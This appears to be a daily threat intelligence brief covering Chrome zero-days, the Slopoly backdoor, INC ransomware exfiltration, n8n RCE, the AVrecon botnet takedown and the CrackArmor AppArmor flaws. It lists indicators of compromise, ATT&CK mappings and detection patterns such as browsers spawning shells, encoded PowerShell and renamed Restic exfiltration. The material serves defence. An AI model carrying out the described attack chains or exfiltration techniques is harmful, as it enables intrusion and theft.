Cyber Threat Brief — March 14 2026
1. Google Chrome Zero-Days Actively Exploited (CVE-2026-3909 & CVE-2026-3910)
Summary
Two Chrome zero-days hit CISA KEV on March 13, both discovered March 10 and already weaponized in the wild. CVE-2026-3909 is an out-of-bounds write in Skia (Chrome’s rendering engine — CWE-787), and CVE-2026-3910 is an out-of-bounds memory buffer restriction failure in the V8 JavaScript engine (CWE-119). The Skia bug is the nastier of the two: OOB writes in a renderer allow overwriting adjacent memory regions, which in browser context translates to sandbox escape and arbitrary code execution on the victim host. Google hasn’t attributed the attacks or shared exploitation details, but the vector is consistent with all browser renderer exploits: victim visits a crafted page, renderer processes malicious content, exploit fires. Patch now.
What’s New (Last 24 Hours)
- CISA added both CVEs to the Known Exploited Vulnerabilities catalog on March 13, 2026 (due date: March 27)
- Google confirmed both flaws were discovered on March 10 and are being exploited in the wild
- Tenable confirmed the standard drive-by attack vector (crafted HTML page)
- Chrome stable channel update issued March 12, 2026
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
| Crafted HTML page delivered via drive-by | TTP | T1203 (Exploitation for Client Execution) | Web proxy / browser telemetry | Alert on browser processes spawning unexpected child processes; look for chrome.exe or msedge.exe spawning cmd.exe, powershell.exe, or wscript.exe |
| Skia OOB write triggers renderer process crash or code exec | TTP | T1203 (Exploitation for Client Execution) | EDR process/crash telemetry | Monitor for abnormal child processes spawned from browser renderer processes (e.g., chrome renderer pid → shell) |
| Sandbox escape post-renderer compromise | TTP | T1611 (Escape to Host) | EDR process lineage | Detect renderer-origin process creation outside expected browser child process tree |
chrome.exe or msedge.exe spawning unexpected child | Process pattern | T1059 (Command and Scripting Interpreter) | EDR process creation logs | Alert on browser process spawning cmd.exe, powershell.exe, wscript.exe, mshta.exe |
| Patch version gates: Chrome < 134.x (pre-March 12 build) | TTP | T1190 (Exploit Public-Facing Application) | Asset inventory / patch management | Hunt for unpatched Chrome versions in your environment using software inventory |
Potential Detection Coverage Based on MITRE ATT&CK Technique
| Source | Detections | Coverage |
|---|
| Splunk | None found for Chrome/Skia/V8 specifically | No direct Splunk ESCU rules for this Chrome renderer exploitation chain; monitor for browser child process anomalies via Endpoint data model |
| Elastic | Suspicious Browser Child Process | Fires on browser processes (Chrome, Safari, Firefox) spawning suspicious child processes — directly covers post-exploitation child process creation after renderer sandbox escape |
| Sigma | Suspicious Browser Child Process - MacOS | Detects browser processes spawning unexpected children on macOS; maps directly to sandbox escape TTP where attacker pivots from browser renderer to system process |
Sources
2. Hive0163 Slopoly: AI-Generated Backdoor in Active Ransomware Campaigns
Summary
IBM X-Force published analysis of Slopoly, an AI-assisted PowerShell backdoor deployed by Hive0163 (the group behind Interlock ransomware). Attacks start with ClickFix social engineering: victim executes a crafted PowerShell command, drops NodeSnake, which retrieves Interlock RAT, which then deploys Slopoly for persistent post-exploitation access. Slopoly is a full-featured C2 client written in PowerShell — beacons system info every 30 seconds, polls for commands every 50 seconds, executes via cmd.exe, and was active for more than a week before detection. The “AI-assisted” angle is real but not scary: AI made the code cleaner and faster to write, not more sophisticated. The TTPs are classic ransomware pre-positioning.
What’s New (Last 24 Hours)
- IBM X-Force published full Slopoly analysis (March 13, 2026)
- Confirmed attack chain: ClickFix → NodeSnake → Interlock RAT → Slopoly → Interlock Ransomware
- Slopoly persistence: scheduled task named “Runtime Broker” from
C:\ProgramData\Microsoft\Windows\Runtime\
- Slopoly C2 beacon: heartbeat every 30s, command poll every 50s via
cmd.exe
- Hive0163 also using initial access brokers TA569 (SocGholish) and TAG-124 (KongTuke/LandUpdate808)
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
C:\ProgramData\Microsoft\Windows\Runtime\ | File path | T1547.001 (Registry Run Keys / Startup Folder) | EDR file system telemetry | Alert on new PowerShell script creation in this path; Slopoly drops here |
| Scheduled task named “Runtime Broker” | Scheduled task name | T1053.005 (Scheduled Task/Job: Scheduled Task) | Windows Security Event Log (Event ID 4698/4702) | Hunt for scheduled tasks named “Runtime Broker” not created by SYSTEM from known-good paths |
PowerShell beacon: 30s heartbeat, 50s command poll via cmd.exe | TTP | T1059.001 (PowerShell) | EDR process creation / network telemetry | Hunt for powershell.exe making periodic outbound HTTP connections at ~30–50s intervals; look for powershell spawning cmd.exe repeatedly |
| ClickFix: user executes crafted PowerShell from browser/clipboard | TTP | T1204.001 (User Execution: Malicious Link) | EDR process creation (parent: browser → powershell) | Detect browser process or Run dialog spawning powershell.exe with encoded/long command line |
| NodeSnake (first-stage loader) | TTP | T1105 (Ingress Tool Transfer) | EDR / network proxy | Alert on powershell.exe downloading and executing additional payloads shortly after ClickFix interaction |
| Base64-encoded PowerShell command string at initial execution | Command pattern | T1027 (Obfuscated Files or Information) | EDR command line telemetry | Hunt for powershell.exe -enc or -EncodedCommand with long base64 payloads spawned from browser processes |
Potential Detection Coverage Based on MITRE ATT&CK Technique
Sources
3. INC Ransomware: Standardized Pre-Encryption Exfiltration Playbook Exposed
Summary
Huntress analysts documented two near-identical INC ransomware intrusions (Feb 9 and Feb 25, 2026), reconstructing the group’s standardized exfiltration playbook. The TL;DR: PsExec for privilege escalation, a scheduled task called “Recovery Diagnostics” running base64-encoded PowerShell, a renamed Restic binary (disguised as winupdate.exe) exfiltrating to a Wasabi S3 bucket with hardcoded credentials, then a methodical sweep of security tools (VIPRE uninstaller, Windows Defender disabled, Acronis killed with HRSword) before launching INC ransomware disguised as win.exe. Identical cloud credentials across both incidents mean the infrastructure is attributable.
What’s New (Last 24 Hours)
- Huntress published IR report with hashes and exfiltration infrastructure details (March 13, 2026)
- SHA256 hashes confirmed:
1d15b57db62c079fc6274f8ea02ce7ec3d6b158834b142f5345db14f16134f0d (edr.exe) and e034a4c00f168134900bfe235ff2f78daf8bfcfa8b594cd2dd563d43f5de1b13 (win.exe)
- Exfiltration destination: Wasabi S3 bucket; hardcoded password literally “password”
- Scheduled task “Recovery Diagnostics” used for persistence across both incidents
- Identical cloud credentials across Jan 22, Feb 9, and Feb 25 incidents confirm same threat actor
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
1d15b57db62c079fc6274f8ea02ce7ec3d6b158834b142f5345db14f16134f0d | File hash (SHA256) | T1562.001 (Impair Defenses: Disable or Modify Tools) | EDR file hash telemetry | Block/alert on this hash — confirmed edr.exe security tool disabler |
e034a4c00f168134900bfe235ff2f78daf8bfcfa8b594cd2dd563d43f5de1b13 | File hash (SHA256) | T1486 (Data Encrypted for Impact) | EDR file hash telemetry | Block/alert on this hash — confirmed INC ransomware dropper win.exe |
winupdate.exe (renamed Restic backup utility) | Process name | T1036.005 (Masquerading: Match Legitimate Name) | EDR process telemetry | Hunt for processes named winupdate.exe where binary is NOT signed by Microsoft or Restic; Restic has known PE characteristics |
| Scheduled task “Recovery Diagnostics” | Scheduled task name | T1053.005 (Scheduled Task/Job: Scheduled Task) | Windows Security Event Log (4698/4702) | Alert on scheduled task creation with this exact name; used for persistence + payload execution in both incidents |
| Base64-encoded PowerShell configuring Wasabi S3 env vars | Command pattern | T1059.001 (PowerShell) | EDR command line telemetry | Hunt powershell.exe -enc commands referencing S3/Wasabi environment variables (WASABI_*, AWS_* combined with restic CLI patterns) |
| PsExec execution for lateral movement / privilege escalation | Process + parent | T1569.002 (System Services: Service Execution) | EDR process creation / Windows Security logs | Alert on psexec.exe (or PSEXESVC service) creation; monitor for non-admin accounts running PsExec |
| HRSword.exe (Acronis killer) | Process name | T1562.001 (Impair Defenses: Disable or Modify Tools) | EDR process creation | Hunt for HRSword.exe execution; known security tool terminator used specifically by this INC cluster |
| Wasabi S3 exfiltration destination | Network artifact | T1048 (Exfiltration Over Alternative Protocol) | Network proxy / firewall | Alert on outbound HTTPS connections to s3.wasabisys.com from endpoints (especially paired with Restic-style backup command patterns) |
Potential Detection Coverage Based on MITRE ATT&CK Technique
| Source | Detections | Coverage |
|---|
| Splunk | Scheduled Task Deleted Or Created via CMD, Suspicious Scheduled Task from Public Directory, Windows PowerShell ScheduleTask, Randomly Generated Scheduled Task Name | Strong coverage for T1053.005 — “Recovery Diagnostics” task creation via PowerShell or CMD will trigger multiple rules; the scheduled task from public/temp directory rule may trigger if task payload path is outside system dirs |
| Elastic | None found | No direct Elastic rules for Restic-based exfiltration or INC ransomware; general exfiltration anomaly rules may trigger on Wasabi S3 connections |
| Sigma | None found for Restic/INC specifically | No Sigma rules in current corpus specifically for renamed Restic or Wasabi exfiltration; hunt queries against process creation logs for winupdate.exe + Restic binary attributes recommended |
Sources
4. n8n Expression Injection RCE — CISA KEV, 24,700 Instances Still Exposed
Summary
CISA added CVE-2025-68613 to KEV on March 11, 2026. The flaw is an expression injection in n8n’s workflow automation platform — an authenticated attacker can inject code into the workflow expression evaluator and achieve RCE with the privileges of the n8n process. CVSS 9.9. Patched in December 2025 (versions 1.120.4, 1.121.1, 1.122.0), but as of early February, Shadowserver still counted 24,700+ unpatched instances online (12,300+ in North America). A companion flaw CVE-2026-27577 (CVSS 9.4) was also disclosed as a related bypass. FCEB agencies must patch by March 25.
What’s New (Last 24 Hours)
- CISA KEV addition confirmed March 11; widespread reporting March 13-14
- Shadowserver data shows 24,607 unpatched instances as of Feb 5, 2026 — exposure window still large
- CVE-2026-27577 disclosed as additional bypass following CVE-2025-68613 patch
- No public PoC or exploitation details released; attack requires authentication
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
| n8n workflow API endpoint receiving expression evaluation requests | TTP | T1190 (Exploit Public-Facing Application) | Web/application server logs | Monitor n8n API logs for unusual expression payloads; look for system-level commands, env variable access, or file reads in workflow expressions |
| n8n process spawning unexpected child processes post-exploitation | TTP | T1059 (Command and Scripting Interpreter) | EDR process creation (parent: n8n node process) | Alert on node.js (n8n) spawning shell commands — sh -c, bash, cmd.exe, or Python execution |
| n8n versions < 1.120.4, < 1.121.1, < 1.122.0 | Patch version gate | T1190 (Exploit Public-Facing Application) | Asset/software inventory | Immediately enumerate n8n instances in your environment; prioritize external-facing deployments |
| Authenticated API abuse via workflow expression endpoint | TTP | T1078 (Valid Accounts) | Application authentication logs | Audit n8n user accounts; restrict who can create/edit workflows; monitor for new workflow creation by unusual accounts |
Potential Detection Coverage Based on MITRE ATT&CK Technique
| Source | Detections | Coverage |
|---|
| Splunk | Confluence Pre-Auth RCE via OGNL Injection CVE-2023-22527 | Partial analogy — detection logic for expression/template injection in web apps; no n8n-specific rule exists; adapt pattern for n8n API endpoint monitoring |
| Elastic | None found | No n8n-specific Elastic rules; general process anomaly rules for node.js spawning shells would provide behavioral coverage |
| Sigma | None found | No Sigma rules for CVE-2025-68613; recommend creating custom rule monitoring n8n process tree for unexpected child process spawning |
Sources
5. SocksEscort / AVrecon Botnet Dismantled — Operation Lightning
Summary
Law enforcement across 9 countries (Europol-coordinated Operation Lightning) took down SocksEscort, a criminal proxy service that ran on top of the AVrecon botnet. SocksEscort had compromised approximately 369,000 routers and IoT devices across 163 countries since 2020; as of February 2026 about 8,000 infected routers were active (2,500 in the US). The botnet was powered by AVrecon malware, which Lumen Black Lotus Labs documented in 2023 — it targets SOHO routers via known RCE vulnerabilities (Cisco, D-Link, Hikvision, MikroTik, Netgear, TP-Link, Zyxel), establishes a SOCKS5 proxy, and phones home. Takedown removed 34 domains and 23 servers; $3.5M in crypto frozen. Residual IOCs still useful for hunting persistent infections.
What’s New (Last 24 Hours)
- Operation Lightning takedown announced March 13-14, 2026
- 34 domains and 23 servers seized; socksescort[.]com domain sinkholed
- AVrecon loader MD5:
007fe05132e429ff57393163354f4c90; AVrecon malware MD5: 444138b1d805808a06c4b908c7b73d96
- C2 domains:
advstat[.]cc, meterstrack[.]cc
- C2 IPs:
188.138.125[.]163, 176.120.22[.]67
- C2 comms: ports 8000 and 8080 using hardcoded PING/PONG loop
- Europol stated infection vector: “vulnerability in residential modems of a specific brand”
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
advstat[.]cc | C2 domain | T1071.001 (Application Layer Protocol: Web) | DNS logs / proxy logs | Block and alert on DNS lookups or connections to this domain; still useful for hunting surviving infections |
meterstrack[.]cc | C2 domain | T1071.001 (Application Layer Protocol: Web) | DNS logs / proxy logs | Block and alert; pair with netflow data for botnet C2 beacon patterns |
188.138.125[.]163 | C2 IP | T1090.002 (Proxy: External Proxy) | Firewall / netflow | Block outbound connections to this IP; alert on any existing sessions |
176.120.22[.]67 | C2 IP | T1090.002 (Proxy: External Proxy) | Firewall / netflow | Block outbound connections to this IP; correlate with router syslog for outbound TCP 8000/8080 |
| Outbound TCP 8000/8080 PING/PONG beacon pattern | Network behavior | T1071.001 (Application Layer Protocol: Web) | Firewall / netflow | Hunt for SOHO routers generating periodic outbound connections on ports 8000 or 8080 to external IPs |
007fe05132e429ff57393163354f4c90 | File hash (MD5) | T1542.001 (System Firmware) | Router/IoT firmware integrity | Use in threat intel platforms; scan for this hash in router firmware dumps or managed router telemetry |
444138b1d805808a06c4b908c7b73d96 | File hash (MD5) | T1542.001 (System Firmware) | Router/IoT firmware integrity | Same as above; pair with Shodan/Censys scans to identify still-infected devices in corporate IP space |
Potential Detection Coverage Based on MITRE ATT&CK Technique
| Source | Detections | Coverage |
|---|
| Splunk | None found for AVrecon/SocksEscort specifically | No direct ESCU rules for residential proxy botnet behavior; hunt via network telemetry using C2 IOCs above; Splunk Enterprise Security threat intel framework can ingest IOC blocklist |
| Elastic | None found | No Elastic rules for AVrecon; general network anomaly rules for SOHO device outbound traffic would require custom configuration |
| Sigma | APT User Agent | Partial — proxy UA rules cover some botnet C2 user agent patterns; not AVrecon-specific but provides baseline proxy traffic monitoring relevant to T1090.002 |
Sources
6. CrackArmor: Nine AppArmor Flaws Enable Linux Local Privilege Escalation to Root
Summary
Qualys TRU disclosed nine vulnerabilities in AppArmor (dubbed “CrackArmor”) affecting 12.6+ million enterprise Linux instances. The core flaw is a confused-deputy vulnerability: an unprivileged local user can manipulate AppArmor security profiles via pseudo-files, bypass user-namespace restrictions, and execute arbitrary kernel code — resulting in privilege escalation to root. Flaw dates to 2017 (kernel v4.11+). No CVEs assigned yet (intentional upstream kernel process delay). Ubuntu, Debian, and SUSE are affected by default. The Qualys team also documented DoS vectors: loading “deny-all” profiles against critical services and triggering recursive kernel stack exhaustion via deeply-nested subprofile removal. Working PoC exists internally at Qualys; public release withheld pending patches.
What’s New (Last 24 Hours)
- Qualys TRU published CrackArmor advisory March 12-13, 2026
- 9 vulnerabilities disclosed; PoC developed and shared with upstream kernel team under coordinated disclosure
- Attack vector: unprivileged local user → pseudo-file manipulation → AppArmor profile bypass → root
- Detection guidance: monitor
/sys/kernel/security/apparmor/ for unauthorized profile modifications
- Mitigation: emergency kernel patching required; no effective interim workaround
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
/sys/kernel/security/apparmor/ pseudo-file manipulation | File path / TTP | T1068 (Exploitation for Privilege Escalation) | Linux auditd / file integrity monitoring | Monitor for writes/modifications to /sys/kernel/security/apparmor/ by non-root, non-admin processes; baseline normal AppArmor admin writes |
| Unprivileged user process accessing AppArmor profile pseudo-files | TTP | T1068 (Exploitation for Privilege Escalation) | Linux auditd (syscall audit, open/write on apparmor paths) | Alert on open(2) or write(2) syscalls targeting /sys/kernel/security/apparmor/ from UID > 0 |
| ”Deny-all” profile loading for critical services (DoS path) | TTP | T1499 (Endpoint Denial of Service) | Linux auditd / AppArmor audit logs | Hunt for aa-enforce or profile load operations on system services outside expected admin windows |
| Kernel panic from recursive subprofile removal (stack exhaustion on x86-64) | TTP | T1499 (Endpoint Denial of Service) | System crash/kernel log (/var/log/kern.log, dmesg) | Alert on unexpected kernel panics on Linux hosts; correlate with preceding AppArmor profile operations |
| Linux kernel version < patched (v4.11–present, Ubuntu/Debian/SUSE default) | Patch gate | T1068 (Exploitation for Privilege Escalation) | Asset inventory / kernel version scan | Enumerate Linux hosts running AppArmor; prioritize cloud, Kubernetes, and edge instances for emergency kernel patching |
Potential Detection Coverage Based on MITRE ATT&CK Technique
| Source | Detections | Coverage |
|---|
| Splunk | Linux pkexec Privilege Escalation | Partial — covers T1068 Linux LPE patterns broadly; not AppArmor-specific but the process behavior (unprivileged process achieving elevated execution) is analogous; useful as baseline while AppArmor-specific rules are developed |
| Elastic | None found | No Elastic rules for AppArmor-specific LPE; auditd integration with Elastic Agent would be needed to surface the pseudo-file access syscalls |
| Sigma | None found | No Sigma rules for CrackArmor; recommend creating custom auditd-based Sigma rule monitoring writes to /sys/kernel/security/apparmor/ from unprivileged UIDs |
Sources
Brief generated: 2026-03-14 05:00 PT | Sources gathered from web search, X/social, GitHub PoC monitoring, and CISA KEV